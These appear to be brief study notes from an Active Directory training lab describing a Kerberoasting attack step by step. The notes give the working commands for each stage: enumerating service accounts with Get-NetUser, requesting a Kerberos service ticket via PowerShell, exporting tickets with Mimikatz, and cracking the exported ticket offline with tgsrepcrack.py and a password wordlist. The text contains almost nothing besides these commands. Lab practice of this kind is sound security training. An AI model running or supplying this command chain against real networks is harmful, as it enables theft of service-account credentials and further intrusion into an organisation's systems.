Find User Accounts

Get-NetUser -SPN

Request Ticket For Service

Add-Type -AssemblyNAme System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
klist

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/045d791a-bffa-44f0-9bda-0f1379a4cfd1/Untitled.png

Dump Ticket

Invoke-Mimikatz -Command '"kerberos::list /export"'

Crack Password

python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\1-40a10000-student648@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

Deep Dive into Kerberoasting Attack